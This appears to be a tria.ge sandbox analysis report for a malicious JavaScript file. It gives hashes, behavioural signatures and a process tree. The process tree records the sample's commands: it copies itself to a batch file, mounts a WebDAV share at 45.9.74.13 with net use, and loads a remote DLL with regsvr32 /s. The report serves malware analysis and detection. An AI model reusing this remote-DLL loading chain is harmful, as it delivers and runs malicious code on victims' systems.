Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
09/07/2024, 07:34
Static task
static1
Behavioral task
behavioral1
Sample
2707398642559127343.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
2707398642559127343.js
Resource
win10v2004-20240704-en
General
-
Target
2707398642559127343.js
-
Size
5KB
-
MD5
c8c6f2cd727679d66031250fadadb58c
-
SHA1
4ce051b3bd77b04cdd56042825bdea493b53c537
-
SHA256
1b63022777404a40a968a35a13e1aec846789051a4e1dfa204d40b8d637f1707
-
SHA512
ded49cf5c61c60d6ee3d1a26b6ba0b104e03fa11fc8680bc54f9f28641f3f07061a2375a0091685a1cb851b616d2ed8207581f39a3439ab0acee98481443354b
-
SSDEEP
96:Ickum+YFbacAUVwfk0PmZBvZfDJxgb5JbJCrWrkje:Ickwfk0PAvZfDJxgb5JbJCSrkje
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2828 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2380 wrote to memory of 536 2380 wscript.exe 30 PID 2380 wrote to memory of 536 2380 wscript.exe 30 PID 2380 wrote to memory of 536 2380 wscript.exe 30 PID 536 wrote to memory of 2868 536 cmd.exe 32 PID 536 wrote to memory of 2868 536 cmd.exe 32 PID 536 wrote to memory of 2868 536 cmd.exe 32 PID 536 wrote to memory of 2828 536 cmd.exe 33 PID 536 wrote to memory of 2828 536 cmd.exe 33 PID 536 wrote to memory of 2828 536 cmd.exe 33 PID 536 wrote to memory of 2828 536 cmd.exe 33 PID 536 wrote to memory of 2828 536 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2707398642559127343.js1⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2707398642559127343.js" "C:\Users\Admin\\quiesb.bat" && "C:\Users\Admin\\quiesb.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2868
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\965.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2828
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5c8c6f2cd727679d66031250fadadb58c
SHA14ce051b3bd77b04cdd56042825bdea493b53c537
SHA2561b63022777404a40a968a35a13e1aec846789051a4e1dfa204d40b8d637f1707
SHA512ded49cf5c61c60d6ee3d1a26b6ba0b104e03fa11fc8680bc54f9f28641f3f07061a2375a0091685a1cb851b616d2ed8207581f39a3439ab0acee98481443354b